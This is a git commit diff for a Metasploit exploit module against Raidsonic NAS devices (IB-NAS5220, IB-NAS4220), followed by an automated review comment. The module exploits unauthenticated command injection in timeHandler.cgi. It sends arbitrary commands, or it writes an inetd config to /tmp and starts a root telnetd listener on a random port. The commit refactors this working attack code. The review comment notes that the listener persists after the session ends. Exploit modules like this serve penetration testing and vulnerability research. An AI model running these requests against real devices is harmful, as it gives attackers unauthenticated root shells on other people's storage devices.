feedback included
parent
b8ed364cb8
commit
34134b2e11
|
@ -12,12 +12,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::CommandShell
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution',
|
||||
'Description' => %q{
|
||||
Different Raidsonic NAS devices are vulnerable to OS command injection via the web
|
||||
Different Raidsonic NAS devices are vulnerable to OS command injection via the web
|
||||
interface. The vulnerability exists in timeHandler.cgi, which is accessible without
|
||||
authentication. This module has been tested with the versions IB-NAS5220 and
|
||||
IB-NAS4220.
|
||||
|
@ -64,6 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
@response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
|
||||
if target.name =~ /CMD/
|
||||
exploit_cmd
|
||||
else
|
||||
|
@ -75,11 +77,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if not (datastore['CMD'])
|
||||
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
|
||||
end
|
||||
response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
|
||||
print_status("#{rhost}:#{rport} - Sending remote command")
|
||||
res = request(payload.encoded)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{response_pattern}/)
|
||||
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
|
@ -91,8 +92,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit_telnet
|
||||
telnetport = rand(65535)
|
||||
|
||||
response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
|
||||
|
||||
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
|
||||
|
||||
#first request
|
||||
|
@ -102,29 +101,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
#second request
|
||||
cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/inetd.conf"
|
||||
inetd_cfg = rand_text_alpha(8)
|
||||
cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
|
||||
cmd = Rex::Text.uri_encode(cmd)
|
||||
vprint_status("#{rhost}:#{rport} - sending second request - configure inetd")
|
||||
register_file_for_cleanup("/tmp/#{inetd_cfg}")
|
||||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
#third request
|
||||
cmd = "/usr/sbin/inetd /tmp/inetd.conf"
|
||||
cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}"
|
||||
cmd = Rex::Text.uri_encode(cmd)
|
||||
vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")
|
||||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
|
@ -136,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
begin
|
||||
|
|
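Review bot: The new `register_file_for_cleanup("/tmp/#{inetd_cfg}")` call in `exploit_telnet` covers only the randomly named inetd config file. The inetd/telnetd instance that the third request starts from that file appears to keep listening as root on the device after the session ends, and nothing in the visible hunks stops it. The rest of `exploit_telnet` after `begin` is outside this view, so confirm whether the listener is torn down there. If it is not, operators and defenders should be told about the residual state, for example with a comment next to the registration such as `# cleanup deletes only /tmp/<inetd_cfg>; the inetd-spawned telnetd keeps listening until it is stopped or the device reboots`, and a matching sentence in the module 'Description'. The registration also runs before the second request's response is checked, so moving it below that check would avoid registering a file that was never written.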